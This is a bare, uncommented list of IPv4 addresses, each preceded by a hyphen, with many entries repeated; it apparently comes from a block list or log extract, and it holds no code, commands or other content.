-200.137.6.96 -212.81.199.176 -54.157.70.144 -50.116.21.135 -195.246.49.36 -110.170.243.104 -93.56.31.70 -190.143.78.137 -18.210.240.101 -72.2.130.226 -207.104.75.231 -52.74.70.160 -212.43.97.3 -54.88.93.179 -54.89.105.107 -81.18.99.12 -113.161.100.211 -54.92.217.202 -172.105.47.99 -203.246.159.173 -116.203.66.219 -52.204.129.206 -208.78.163.80 -14.63.218.222 -85.105.246.241 -23.106.61.72 -191.37.242.85 -52.3.22.234 -52.5.87.201 -179.96.231.69 -67.109.224.163 -34.132.66.81 -138.94.114.18 -201.157.59.231 -202.152.23.72 -146.12.194.69 -194.176.109.138 -146.12.194.70 -199.101.246.195 -194.48.244.99 -3.215.183.132 -88.250.224.14 -103.41.32.203 -172.105.49.175 -50.30.96.150 -34.66.20.253 -208.103.14.36 -85.25.207.215 -182.18.157.87 -153.127.12.60 -69.13.19.72 -54.185.239.213 -192.101.9.131 -3.85.234.194 -89.200.193.141 -177.19.235.223 -201.156.82.198 -201.156.82.197 -52.215.175.192 -201.6.242.142 -183.88.214.182 -160.16.111.68 -45.236.240.90 -216.207.192.128 -138.186.17.82 -31.145.74.202 -38.92.140.7 -183.88.214.182 -123.16.245.134 -45.236.240.90 -201.148.103.165 -45.236.240.90 -186.251.226.154 -52.72.4.61 -179.232.214.102 -179.255.34.235 -45.236.240.90 -112.133.230.54 -168.228.181.122 -54.201.72.174 -183.88.214.182 -177.41.215.168 -171.22.25.127 -183.88.214.182 -189.112.56.144 -45.236.240.90 -173.0.157.237 -54.89.15.225 -168.228.219.84 -35.130.132.106 -45.236.240.90 -45.236.240.90 -183.88.214.182 -179.83.221.63 -45.236.240.90 -177.191.248.35 -177.191.33.220 -187.19.205.116 -171.22.25.127 -138.94.114.18 -54.144.21.50 -167.250.241.28 -54.88.133.92 -212.56.196.42 -34.68.46.87 -45.236.240.90 -209.54.6.42 -64.129.215.73 -183.88.214.182 -54.89.15.225 -60.50.151.100 -184.72.112.158 -52.70.106.10 -177.125.214.240 -36.74.150.129 -107.21.219.220 -191.191.162.96 -69.46.7.35 -45.160.26.113 -122.11.242.11 -34.194.74.223 -117.241.219.24 -35.173.27.23 -208.78.163.80 -51.91.18.91 -45.160.27.90 -195.246.49.54 -45.160.27.93 -52.205.91.6 -183.88.214.182 -209.131.10.179 -183.88.214.182 -3.223.114.73 -206.161.23.174 -183.88.214.182 -177.207.230.0 -158.122.132.32 -189.206.13.74 -183.88.214.182 -52.26.96.44 -177.33.46.2 -191.209.50.240 -43.242.101.76 -45.236.240.90 -138.204.117.195 -183.88.214.182 -183.88.214.182 -34.132.242.43 -173.212.230.226 -45.236.240.90 -189.113.119.18 -77.74.192.99 -179.24.225.75 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -187.115.25.154 -3.234.86.27 -131.108.167.26 -104.10.241.1 -168.197.114.161 -183.88.214.182 -183.88.214.182 -208.71.246.23 -183.88.214.182 -107.21.219.220 -37.159.131.134 -54.235.77.41 -194.199.8.31 -183.88.214.182 -183.88.214.182 -82.113.183.13 -77.74.192.100 -34.194.74.223 -88.250.60.53 -200.143.34.203 -113.161.100.211 -52.233.143.134 -204.28.1.106 -208.78.163.74 -209.131.10.179 -146.148.56.142 -179.27.201.140 -196.211.21.19 -183.88.214.182 -185.227.111.208 -199.127.122.137 -199.127.122.132 -45.230.226.244 -199.127.122.154 -34.123.2.177 -193.146.1.93 -146.12.193.117 -45.230.226.247 -122.11.242.11 -183.88.214.182 -183.88.214.182 -3.238.43.240 -146.12.193.107 -146.12.193.32 -213.60.205.36 -146.12.193.34 -217.56.64.17 -146.12.193.24 -146.12.193.47 -52.70.106.10 -183.88.214.182 -54.144.21.50 -146.12.194.34 -146.12.193.138 -202.137.3.250 -194.79.87.5 -146.12.193.241 -162.223.141.201 -179.95.195.6 -183.88.214.182 -183.88.214.182 -45.236.240.90 -201.55.56.73 -110.159.240.114 -146.12.193.129 -3.221.112.171 -104.41.47.46 -181.39.8.38 -40.118.41.32 -81.42.215.31 -183.88.214.182 -47.254.234.152 -187.86.212.133 -62.102.254.175 -104.46.56.205 -54.88.133.92 -123.30.19.14 -4.15.64.162 -187.86.212.155 -18.209.232.109 -13.248.152.34 -202.144.158.94 -183.88.214.182 -8.35.197.226 -183.88.214.182 -146.12.193.79 -182.74.105.107 -162.223.141.203 -146.12.193.70 -162.223.141.212 -180.183.103.19 -183.88.214.182 -3.98.147.225 -54.204.243.211 -52.174.251.243 -43.224.139.176 -183.88.214.182 -183.88.214.182 -146.12.193.48 -183.88.214.182 -177.156.81.175 -183.88.214.182 -183.88.214.182 -177.133.89.222 -187.19.153.151 -179.105.110.2 -171.22.25.127 -201.139.92.50 -183.88.214.182 -45.236.240.90 -186.247.89.217 -45.236.240.90 -191.33.194.1 -189.69.245.41 -150.107.43.131 -183.88.214.182 -178.131.78.161 -45.236.240.90 -186.113.7.219 -54.232.34.196 -179.185.87.188 -183.88.214.182 -45.236.240.90 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -200.123.26.73 -183.88.214.182 -198.178.223.98 -183.88.214.182 -52.53.116.53 -3.221.112.171 -18.229.29.113 -183.88.214.182 -198.178.223.93 -184.72.112.158 -183.88.214.182 -69.20.105.202 -45.236.240.90 -200.123.27.76 -183.88.214.182 -40.118.45.48 -183.88.214.182 -14.207.15.154 -103.255.181.53 -177.180.0.132 -183.88.214.182 -183.88.214.182 -194.48.34.14 -183.88.214.182 -117.239.0.75 -183.88.214.182 -146.12.193.35 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -146.12.193.22 -146.12.193.127 -183.88.214.182 -40.69.59.164 -190.104.80.4 -189.78.251.137 -146.12.193.33 -146.12.193.14 -179.255.34.191 -131.255.82.74 -179.184.26.142 -183.88.214.182 -45.236.240.90 -117.207.120.80 -170.79.75.24 -183.88.214.182 -183.88.214.182 -52.37.135.94 -177.190.201.42 -183.88.214.182 -45.230.226.240 -45.230.226.243 -143.0.196.130 -199.9.63.124 -45.236.240.90 -45.230.226.246 -52.37.129.219 -200.5.9.62 -179.105.237.202 -45.230.226.245 -45.236.240.90 -123.108.201.216 -64.187.126.12 -190.210.182.125 -45.236.240.90 -183.88.214.182 -183.88.214.182 -45.236.240.90 -183.88.214.182 -210.213.238.98 -209.239.2.249 -183.88.214.182 -45.236.240.90 -201.73.0.44 -183.88.214.182 -183.88.214.182 -171.22.25.127 -177.38.159.118 -45.236.240.90 -189.114.38.179 -45.236.240.90 -45.236.240.90 -185.70.135.208 -179.185.17.187 -193.226.144.177 -94.140.123.38 -100.42.70.27 -207.167.244.110 -52.36.35.163 -195.246.49.36 -100.37.240.186 -115.147.19.108 -179.185.17.186 -186.249.10.118 -201.150.45.154 -64.7.163.2 -118.69.70.215 -185.106.240.79 -105.155.1.38 -195.246.49.13 -34.123.2.177 -180.232.98.90 -193.231.34.15 -177.206.246.129 -182.74.124.186 -180.75.10.109 -155.223.64.138 -105.157.183.91 -189.154.128.184 -189.2.175.146 -217.92.76.27 -109.0.132.85 -193.226.144.161 -193.226.144.160 -193.226.144.176 -61.3.202.132 -194.176.109.186 -109.70.138.239 -179.184.11.252 -41.103.236.207 -79.188.136.130 -45.236.240.90 -201.131.6.110 -187.75.90.236 -186.235.86.94 -118.27.13.210 -131.0.200.158 -138.36.98.39 -177.96.36.195 -155.223.64.136 -193.226.144.183 -138.94.109.68 -131.72.127.245 -212.125.32.59 -201.99.104.11 -167.58.166.153 -59.96.230.143 -201.91.150.154 -187.49.72.113 -185.106.240.77 -183.88.214.182 -170.83.172.72 -85.105.91.249 -41.96.160.232 -185.106.240.78 -107.141.138.123 -175.139.226.245 -187.113.202.163 -177.133.232.66 -197.242.145.97 -212.125.32.60 -113.161.75.60 -179.26.29.252 -197.204.31.246 -200.233.227.62 -186.136.52.231 -183.88.214.182 -190.136.107.88 -183.88.214.182 -177.204.231.106 -187.183.209.219 -195.246.49.54 -183.88.214.182 -187.44.94.164 -177.50.181.24 -192.140.42.95 -183.88.214.182 -183.88.214.182 -183.88.214.182 -200.150.162.159 -177.157.82.153 -45.236.240.90 -183.88.214.182 -183.88.214.182 -183.88.214.182 -45.236.240.90 -85.90.3.44 -146.12.194.23 -200.175.239.74 -54.196.176.16 -183.88.214.182 -177.89.200.55 -183.88.214.182 -183.88.214.182 -201.52.229.231 -198.178.223.17 -198.178.223.50 -198.178.223.71 -183.88.214.182 -183.88.214.182 -208.88.174.181 -45.236.240.90 -51.75.28.56 -191.55.196.150 -52.53.116.53 -179.162.194.188 -103.255.181.53 -108.12.191.72 -3.238.43.240 -150.107.43.131 -180.246.18.253 -189.115.159.68 -34.205.75.204 -157.164.189.229 -186.209.30.151 -175.139.130.227 -194.93.124.203 -213.192.238.33 -191.186.216.49 -183.88.214.182 -5.189.160.129 -181.60.245.161 -203.219.25.66 -187.45.177.229 -187.45.177.226 -191.176.8.93 -200.165.167.44 -45.236.240.90 -23.111.106.183 -13.229.34.124 -187.63.203.147 -45.184.68.132 -183.88.214.182 -45.236.240.90 -176.62.70.126 -179.127.169.46 -45.236.240.90 -191.31.17.231 -190.221.155.67 -183.88.214.182 -183.88.214.182 -198.178.223.41 -82.155.68.214 -187.101.18.77 -177.17.113.122 -189.115.92.2 -117.194.143.163 -191.33.239.152 -198.178.223.39 -45.236.240.90 -179.185.187.68 -35.169.161.98 -179.156.230.78 -183.88.214.182 -183.88.214.182 -201.148.100.78 -183.88.214.182 -78.136.8.145 -186.212.45.85 -177.170.252.214 -45.236.240.90 -219.92.24.185 -187.181.184.141 -198.178.223.70 -183.88.214.182 -198.178.223.51 -45.236.240.90 -183.88.214.182 -45.236.240.90 -183.88.214.182 -183.88.214.182 -186.223.231.210 -183.88.214.182 -183.88.214.182 -191.13.74.167 -177.70.201.15 -183.88.214.182 -45.236.240.90 -187.10.243.38 -202.138.126.100 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -189.78.51.105 -175.138.64.26 -187.112.79.66 -187.32.214.251 -45.236.240.90 -187.32.214.249 -183.88.214.182 -45.236.240.90 -183.88.214.182 -187.32.214.250 -45.236.240.90 -189.38.106.97 -191.33.235.217 -177.100.85.141 -183.88.214.182 -183.88.214.182 -45.236.240.90 -171.22.25.127 -177.37.176.53 -189.62.104.69 -109.70.139.71 -201.29.95.115 -45.236.240.90 -108.212.247.197 -138.99.204.113 -45.236.240.90 -171.22.25.127 -183.88.214.182 -189.90.133.31 -177.19.238.87 -187.59.154.144 -177.96.36.195 -183.88.214.182 -202.76.237.70 -181.206.14.31 -183.88.214.182 -61.6.39.96 -177.41.95.10 -45.236.240.90 -50.204.127.154 -61.6.39.232 -183.88.214.182 -183.88.214.182 -45.236.240.90 -177.75.160.181 -183.88.214.182 -167.71.233.146 -143.244.140.120 -179.95.162.21 -54.235.148.34 -45.236.240.90 -201.16.184.147 -179.233.19.59 -183.88.214.182 -41.175.241.74 -179.190.109.72 -54.75.168.58 -24.73.66.174 -5.252.230.181 -177.189.217.166 -183.81.129.68 -190.1.203.16 -207.54.111.226 -159.148.46.154 -109.0.132.85 -67.211.121.139 -201.217.155.234 -183.88.214.182 -90.63.200.192 -81.18.99.12 -37.48.106.141 -200.189.114.63 -37.48.106.138 -105.98.127.25 -185.29.79.192 -59.96.224.75 -146.148.33.251 -138.201.156.202 -194.78.211.169 -177.191.36.133 -140.238.176.2 -186.46.25.210 -190.134.244.86 -50.30.96.132 -50.30.96.133 -50.30.96.150 -207.35.252.13 -198.178.223.49 -82.113.183.57 -110.77.255.144 -198.178.223.31 -64.189.248.43 -41.175.241.75 -41.175.241.76 -50.224.50.115 -91.223.250.77 -47.229.163.50 -109.70.138.201 -94.140.123.253 -183.88.214.182 -182.176.47.35 -45.236.240.90 -204.2.62.60 -171.97.53.2 -103.80.63.66 -213.187.74.103 -213.187.74.98 -100.43.27.25 -193.111.245.198 -35.163.181.189 -67.211.121.139 -76.78.67.27 -85.13.239.210 -212.70.186.10 -191.254.254.221 -200.160.105.247 -83.173.213.252 -187.86.254.146 -94.140.123.144 -45.236.240.90 -51.15.157.7 -93.47.183.203 -84.237.195.20 -190.64.142.116 -41.220.193.38 -110.159.240.115 -72.24.104.202 -41.98.231.76 -37.245.37.140 -94.140.123.231 -213.187.74.100 -200.76.111.137 -195.122.16.252 -187.110.225.22 -177.22.36.236 -185.29.79.194 -186.1.161.70 -81.192.9.198 -87.229.65.80 -161.139.21.211 -161.139.21.213 -91.216.103.40 -189.38.106.98 -200.233.156.143 -117.120.25.21 -195.13.199.212 -45.236.240.90 -80.232.239.42 -80.232.239.44 -177.4.172.84 -79.172.213.31 -66.182.149.20 -202.153.213.123 -67.226.174.25 -54.209.82.14 -82.114.168.10 -94.140.123.67 -94.140.123.36 -95.51.128.243 -95.51.128.242 -200.179.75.138 -95.51.128.240 -213.203.128.68 -83.167.54.20 -67.211.121.140 -189.112.108.198 -200.125.28.162 -142.4.9.133 -142.4.9.114 -183.88.214.182 -185.113.50.140 -103.111.28.194 -72.166.251.6 -187.255.218.197 -138.68.165.49 -45.236.240.90 -186.235.184.82 -183.88.214.182 -115.243.84.244 -200.117.160.113 -180.183.124.50 -183.88.214.182 -216.207.192.31 -183.88.214.182 -183.88.214.182 -45.160.27.95 -183.88.214.182 -45.160.27.91 -179.190.254.157 -45.160.27.89 -103.80.63.66 -179.158.195.130 -45.160.27.94 -52.56.40.206 -54.245.77.247 -183.88.214.182 -45.236.240.90 -103.121.149.26 -183.88.214.182 -177.71.93.60 -179.83.114.181 -195.175.62.226 -183.88.214.182 -177.191.234.240 -183.88.214.182 -183.88.214.182 -183.88.214.182 -45.236.240.90 -171.22.25.127 -191.33.83.84 -103.47.154.165 -219.92.154.217 -41.97.65.94 -35.160.157.103 -177.0.67.178 -186.52.231.159 -187.58.37.48 -179.181.72.242 -45.160.27.88 -192.99.55.146 -183.88.214.182 -186.57.97.60 -104.10.241.1 -3.229.6.21 -41.97.165.87 -181.99.50.82 -179.154.84.174 -103.214.196.1 -197.204.171.65 -186.237.131.26 -117.208.144.230 -181.46.201.172 -103.210.73.249 -201.49.121.227 -179.183.54.232 -179.232.65.27 -179.185.99.111 -183.88.214.182 -103.210.73.119 -189.154.7.160 -200.63.129.137 -183.88.214.182 -189.34.214.139 -138.122.165.174 -179.26.223.226 -45.236.240.90 -183.88.214.182 -177.131.113.135 -183.88.214.182 -179.219.44.238 -45.236.240.90 -45.236.240.90 -183.88.214.182 -18.169.244.131 -45.236.240.90 -183.88.214.182 -45.236.240.90 -162.223.141.212 -117.217.213.140 -183.88.214.182 -183.88.214.182 -45.236.240.90 -179.185.17.188 -191.185.101.156 -183.88.214.182 -183.88.214.182 -186.137.205.125 -191.251.48.99 -179.83.198.130 -45.236.240.90 -189.73.9.180 -191.184.228.97 -18.233.15.84 -177.43.164.66 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -216.207.192.223 -183.88.214.182 -52.20.235.200 -54.89.134.30 -216.207.192.169 -195.175.55.182 -18.206.186.115 -45.236.240.90 -5.196.209.25 -54.89.134.30 -5.196.209.25 -18.206.186.115 -177.103.187.238 -50.17.170.12 -45.236.240.90 -181.30.8.146 -183.88.214.182 -183.88.214.182 -183.88.214.182 -213.177.18.103 -131.255.82.234 -183.88.214.182 -183.88.214.182 -171.22.25.127 -183.88.214.182 -201.6.145.48 -52.37.134.137 -183.88.214.182 -216.207.192.101 -183.88.214.182 -189.79.80.186 -183.88.214.182 -183.88.214.182 -183.88.214.182 -189.112.108.201 -183.88.214.182 -183.88.214.182 -183.88.214.182 -177.30.91.67 -183.88.214.182 -66.112.235.118 -183.88.214.182 -197.204.62.227 -189.28.40.93 -183.88.214.182 -45.236.240.90 -173.230.138.79 -183.88.214.182 -45.236.240.90 -177.22.89.174 -183.88.214.182 -201.174.132.107 -183.88.214.182 -183.88.214.182 -183.88.214.182 -201.0.184.144 -187.33.86.178 -52.20.235.200 -45.236.240.90 -45.236.240.90 -183.88.214.182 -183.88.214.182 -187.75.152.37 -191.253.47.41 -179.152.5.175 -177.158.130.184 -187.181.11.94 -173.79.175.206 -177.154.202.236 -191.180.105.123 -189.231.165.112 -117.215.176.48 -117.200.145.82 -179.107.34.22 -117.202.141.7 -61.2.38.252 -179.186.169.210 -213.190.70.119 -177.191.248.87 -117.217.219.46 -59.98.57.141 -117.200.183.254 -59.98.57.4 -117.207.72.122 -59.98.56.169 -210.186.174.75 -117.216.44.221 -45.236.240.90 -179.183.57.202 -199.16.112.72 -117.213.109.200 -117.201.7.153 -117.201.7.104 -204.106.247.130 -45.55.210.107 -59.92.178.79 -179.26.44.249 -117.217.209.147 -177.84.201.173 -117.216.62.24 -59.91.145.237 -23.88.50.66 -117.251.22.217 -46.255.178.78 -117.222.141.61 -59.98.58.21 -191.31.165.176 -117.222.142.237 -117.201.17.213 -200.238.112.30 -208.78.163.74 -117.207.64.83 -59.96.225.8 -117.221.12.12 -117.213.35.247 -41.97.233.147 -59.96.230.214 -200.238.112.79 -213.190.70.200 -59.92.179.197 -24.37.240.118 -117.202.75.66 -117.213.107.162 -49.205.195.1 -59.98.57.234 -59.98.58.14 -186.50.146.181 -59.92.191.94 -105.98.2.74 -117.197.198.53 -117.221.11.255 -117.248.111.29 -59.96.228.236 -117.200.176.132 -59.98.59.79 -117.201.9.64 -61.2.79.63 -117.221.5.150 -59.92.82.170 -59.94.184.47 -186.57.79.108 -167.60.57.112 -117.221.6.174 -59.90.87.8 -117.201.14.65 -117.201.14.140 -186.214.223.44 -177.139.154.37 -117.217.208.112 -179.83.124.88 -41.96.164.35 -187.21.140.119 -59.88.191.188 -117.215.176.75 -61.3.204.179 -59.91.145.199 -183.88.214.182 -183.88.214.182 -179.233.220.79 -183.88.214.182 -183.88.214.182 -183.88.214.182 -171.22.25.127 -45.236.240.90 -189.5.121.55 -45.236.240.90 -186.212.126.58 -35.184.76.175 -183.88.214.182 -187.35.231.9 -183.88.214.182 -187.72.98.113 -201.16.184.127 -183.88.214.182 -200.159.43.146 -186.209.41.214 -183.88.214.182 -13.244.60.100 -191.31.97.151 -45.236.240.90 -213.132.237.146 -179.95.177.226 -45.236.240.90 -45.236.240.90 -167.86.78.54 -142.93.49.209 -45.236.240.90 -18.144.35.154 -138.186.131.250 -194.244.21.130 -187.33.93.194 -183.88.214.182 -113.161.75.60 -179.83.7.170 -45.236.240.90 -186.235.53.243 -45.236.240.90 -183.88.214.182 -117.194.139.112 -183.88.214.182 -117.221.15.173 -117.221.15.195 -45.236.240.90 -183.88.214.182 -183.88.214.182 -183.88.214.182 -201.69.55.72 -179.83.165.68 -45.230.226.241 -179.183.27.18 -183.88.214.182 -183.88.214.182 -189.45.45.91 -183.88.214.182 -45.236.240.90 -183.88.214.182 -183.88.214.182 -198.178.223.45 -176.113.82.41 -190.134.221.232 -41.103.224.18 -45.236.240.90 -41.96.7.195 -45.236.240.90 -94.140.123.38 -15.229.12.171 -193.136.232.94 -179.219.64.6 -46.255.208.71 -122.0.24.50 -109.70.138.242 -183.88.214.182 -198.12.17.23 -66.112.235.118 -46.19.204.254 -191.232.233.32 -88.119.29.79 -197.204.99.82 -191.242.64.186 -179.26.71.14 -189.59.52.105 -34.224.113.3 -183.88.214.182 -183.88.214.182 -77.93.27.90 -191.19.203.144 -117.217.212.215 -179.27.126.12 -45.236.240.90 -182.176.47.52 -31.134.62.103 -187.63.203.157 -45.236.240.90 -199.48.128.166 -213.187.74.97 -183.88.214.182 -177.43.139.230 -189.61.74.115 -168.0.232.198 -183.88.214.182 -183.88.214.182 -187.45.108.59 -45.236.240.90 -201.21.193.166 -183.88.214.182 -45.236.240.90 -200.75.18.27 -45.184.180.167 -183.88.214.182 -164.163.1.246 -186.206.168.192 -200.117.160.164 -177.170.251.121 -183.88.214.182 -173.0.157.237 -171.22.25.127 -183.88.214.182 -183.88.214.182 -177.137.232.114 -52.19.113.25 -43.241.39.57 -183.88.214.182 -149.202.95.4 -183.88.214.182 -190.134.229.226 -187.113.198.96 -183.88.38.89 -74.63.215.4 -183.88.214.182 -45.236.240.90 -177.103.239.237 -52.37.42.144 -177.10.108.113 -183.88.214.182 -45.236.240.90 -59.96.226.200 -103.227.97.240 -183.88.214.182 -117.200.183.178 -52.11.236.246 -59.88.177.221 -187.11.2.75 -180.247.86.94 -52.25.251.44 -52.37.129.219 -44.197.102.188 -202.29.15.27 -52.37.47.139 -202.129.39.217 -52.37.134.137 -165.22.253.165 -45.236.240.90 -202.29.15.100 -52.37.42.144 -118.101.25.148 -183.88.214.182 -52.37.135.94 -52.25.227.217 -24.232.129.33 -52.26.96.44 -52.36.35.163 -162.223.141.213 -177.98.41.183 -177.30.104.127 -162.223.141.201 -15.223.2.180 -183.88.214.182 -100.43.27.25 -162.223.141.203 -183.88.214.182 -183.88.214.182 -162.223.141.202 -183.88.214.182 -41.96.68.140 -162.223.141.198 -183.88.214.182 -131.196.47.174 -45.236.240.90 -183.88.214.182 -183.88.214.182 -167.60.123.253 -116.73.4.61 -186.50.102.225 -41.99.48.157 -177.159.36.134 -183.88.214.182 -171.22.25.127 -83.0.71.161 -196.64.93.84 -189.254.232.12 -186.53.122.53 -197.204.216.236 -41.142.110.198 -181.81.152.133 -183.88.214.182 -189.154.70.93 -186.207.241.134 -117.216.110.218 -177.105.192.38 -183.88.214.182 -201.47.220.10 -177.159.139.155 -101.108.184.73 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -54.162.169.147 -183.88.214.182 -183.88.214.182 -186.113.6.89 -183.88.214.182 -183.88.214.182 -200.232.94.114 -177.22.88.168 -183.88.214.182 -183.88.214.182 -45.236.240.90 -177.96.230.50 -183.88.214.182 -45.236.240.90 -177.94.4.165 -183.88.214.182 -178.33.182.230 -203.188.245.110 -196.50.193.245 -183.88.214.182 -183.88.214.182 -179.176.99.181 -69.46.7.35 -183.88.214.182 -183.88.214.182 -45.236.240.90 -179.83.128.38 -183.88.214.182 -202.29.15.100 -13.38.39.30 -201.149.45.235 -183.88.214.182 -183.88.214.182 -191.30.6.157 -179.162.44.35 -183.88.214.182 -187.108.204.4 -183.88.214.182 -183.88.214.182 -179.216.18.42 -183.88.214.182 -45.236.240.90 -183.88.214.182 -177.203.226.90 -177.17.251.4 -200.117.160.246 -191.191.55.32 -191.33.12.189 -217.170.246.105 -18.233.96.78 -45.236.240.90 -45.236.240.90 -191.193.228.16 -183.88.214.182 -173.255.201.22 -187.39.19.211 -61.6.39.106 -44.192.66.192 -183.88.214.182 -45.236.240.90 -138.36.105.19 -183.88.214.182 -201.16.176.105 -179.104.181.119 -45.236.240.90 -67.206.206.30 -177.221.205.202 -183.88.214.182 -183.88.214.182 -206.42.32.119 -183.88.214.182 -183.88.214.182 -186.209.134.180 -207.144.250.5 -45.236.240.90 -137.184.166.13 -183.88.214.182 -45.236.240.90 -171.22.25.127 -183.88.214.182 -45.164.52.244 -183.88.214.182 -124.120.143.245 -179.247.179.95 -183.88.214.182 -191.187.87.147 -183.88.214.182 -67.228.123.72 -67.22.16.245 -183.88.214.182 -183.88.214.182 -183.88.214.182 -177.4.252.187 -189.46.142.19 -201.17.246.174 -183.88.214.182 -45.236.240.90 -183.88.214.182 -14.207.41.153 -183.88.214.182 -115.241.228.154 -34.195.209.211 -62.215.164.96 -183.88.214.182 -183.88.214.182 -183.88.214.182 -44.192.66.192 -183.88.214.182 -183.88.214.182 -201.59.104.132 -183.88.214.182 -45.236.240.90 -179.219.45.40 -183.88.214.182 -45.191.204.3 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -201.234.196.211 -190.128.229.146 -201.10.90.82 -186.86.49.71 -41.99.23.139 -180.75.9.185 -177.191.249.243 -177.191.248.221 -179.185.177.177 -186.206.247.92 -117.212.189.169 -87.245.100.147 -197.204.243.72 -186.48.12.226 -179.24.192.134 -117.221.15.156 -179.26.225.56 -41.98.9.27 -177.154.195.36 -41.251.182.131 -177.136.194.95 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -187.19.165.125 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -45.236.240.90 -183.88.214.182 -183.88.214.182 -183.88.214.182 -110.74.132.150 -177.34.232.139 -45.236.240.90 -183.88.214.182 -183.88.214.182 -191.250.61.94 -177.177.94.179 -183.88.214.182 -183.88.214.182 -41.96.242.183 -181.220.20.227 -177.37.166.224 -200.75.18.27 -45.179.75.112 -179.27.152.204 -183.88.214.182 -183.88.214.182 -183.88.214.182 -67.58.190.152 -183.88.214.182 -186.214.245.91 -37.48.106.140 -41.99.45.151 -183.88.214.182 -183.88.214.182 -45.236.240.90 -183.88.214.182 -183.88.214.182 -183.88.214.182 -18.212.177.246 -177.72.160.249 -138.68.160.145 -118.69.70.215 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -171.22.25.127 -187.255.217.92 -183.88.214.182 -45.236.240.90 -183.88.214.182 -183.88.214.182 -45.236.240.90 -171.22.25.127 -207.144.250.6 -183.88.214.182 -207.144.250.4 -45.236.240.90 -191.31.22.251 -123.58.201.173 -59.91.152.224 -191.54.226.15 -117.202.71.45 -183.88.214.182 -117.200.159.105 -186.52.220.8 -59.92.68.133 -59.91.153.214 -177.132.224.152 -45.236.240.90 -14.186.112.158 -180.75.10.240 -59.93.165.109 -117.200.157.191 -200.123.17.94 -117.194.130.18 -117.212.182.177 -117.194.141.52 -177.96.54.172 -59.96.226.139 -41.97.147.126 -117.222.136.158 -117.221.4.249 -117.194.133.1 -117.221.1.95 -117.212.185.200 -117.207.66.29 -117.202.185.42 -59.96.193.79 -117.212.185.128 -117.202.76.199 -152.32.91.87 -117.212.179.189 -59.99.226.150 -117.221.11.195 -117.241.86.204 -117.206.129.77 -117.202.140.49 -61.2.38.175 -59.95.162.141 -117.221.14.179 -117.221.12.135 -117.200.144.79 -117.200.144.96 -59.92.87.196 -117.207.74.185 -59.88.189.140 -117.217.214.49 -117.217.214.238 -187.114.36.141 -117.221.10.33 -103.69.9.50 -117.221.234.172 -117.202.67.79 -45.236.240.90 -41.96.53.84 -183.88.214.182 -59.92.176.82 -183.88.214.182 -59.92.83.247 -179.26.227.187 -117.221.244.214 -117.221.15.201 -59.93.68.171 -61.0.124.226 -117.197.205.246 -183.88.214.182 -201.28.163.138 -183.88.214.182 -183.88.214.182 -45.236.240.90 -183.88.214.182 -183.88.214.182 -202.161.73.90 -183.88.214.182 -183.88.214.182 -201.21.199.127 -45.236.240.90 -183.88.214.182 -183.88.214.182 -138.122.155.212 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -162.223.141.216 -200.208.36.66 -45.236.240.90 -65.74.138.84 -183.88.214.182 -183.88.214.182 -45.236.240.90 -44.195.120.61 -183.88.214.182 -202.79.18.236 -183.88.214.182 -110.159.137.195 -183.88.214.182 -45.236.240.90 -183.88.214.182 -183.88.214.182 -105.159.195.163 -15.222.203.193 -189.112.108.201 -183.88.214.182 -191.250.228.78 -183.88.214.182 -183.88.214.182 -186.113.7.219 -187.11.2.253 -183.88.214.182 -183.88.214.182 -183.88.214.182 -3.91.51.215 -3.91.51.215 -24.158.229.230 -177.220.129.29 -183.88.214.182 -18.233.96.78 -173.0.157.237 -183.88.214.182 -183.88.214.182 -183.88.214.182 -191.189.31.42 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -183.88.214.182 -54.90.165.161 -20.226.50.213 -201.47.57.120 -105.159.190.243 -52.8.97.54 -61.6.33.232 -117.221.8.115 -50.192.234.130 -34.203.156.70 -41.99.57.160 -179.26.80.9 -41.98.255.210 -45.236.240.90 -187.66.125.158 -45.236.240.90 -197.204.252.138 -191.249.123.131 -178.255.138.243 -79.188.26.226 -13.229.34.124 -177.193.178.35 -190.134.4.254 -213.177.18.111 -213.177.18.110 -45.236.240.90 -177.205.215.15 -170.80.38.253 -45.236.240.90 -117.202.47.205 -32.132.131.250 -160.179.41.158 -186.250.93.235 -36.84.85.190 -45.236.240.90 -202.21.32.57 -177.135.7.2 -189.76.152.102 -14.139.245.52 -41.230.13.212 -212.125.32.60 -45.236.240.90 -58.71.194.94 -178.128.156.212 -88.30.31.138 -89.96.190.102 -182.176.47.35 -200.75.18.27 -125.27.197.221 -201.29.82.253 -175.145.131.239 -179.124.43.134 -177.153.239.123 -189.39.47.18 -171.22.25.127 -182.74.105.107 -83.219.0.214 -88.247.61.73 -67.211.121.140 -186.231.6.251 -82.223.65.137 -171.22.25.127 -187.45.177.227 -201.157.59.232 -195.175.103.94 -89.108.129.26 -45.236.240.90 -213.254.6.98 -45.189.119.97 -144.22.138.64 -80.253.65.167 -177.208.10.67 -45.236.240.90 -219.93.103.145 -95.9.185.186 -103.233.160.166 -170.244.32.6 -64.189.248.43 -67.226.174.25 -162.246.17.122 -78.186.38.188 -95.9.7.92 -212.125.32.59 -176.9.42.114 -193.147.39.99 -200.233.226.189 -115.133.110.215 -54.204.197.175 -60.50.157.135 -160.16.111.68 -59.98.56.184 -117.197.192.193 -117.221.8.220 -117.197.194.190 -117.221.2.83 -117.193.214.1 -117.213.104.165 -117.197.198.37 -117.202.64.24 -59.96.229.239 -59.96.228.176 -59.91.144.68 -59.88.179.220 -59.91.144.245 -59.91.144.228 -117.221.13.166 -117.221.13.106 -117.216.56.83 -59.92.184.156 -59.88.179.40 -117.194.134.25 -59.98.56.40 -59.98.56.90 -59.98.56.2 -117.197.204.225 -117.202.143.68 -41.103.225.139 -117.201.8.112 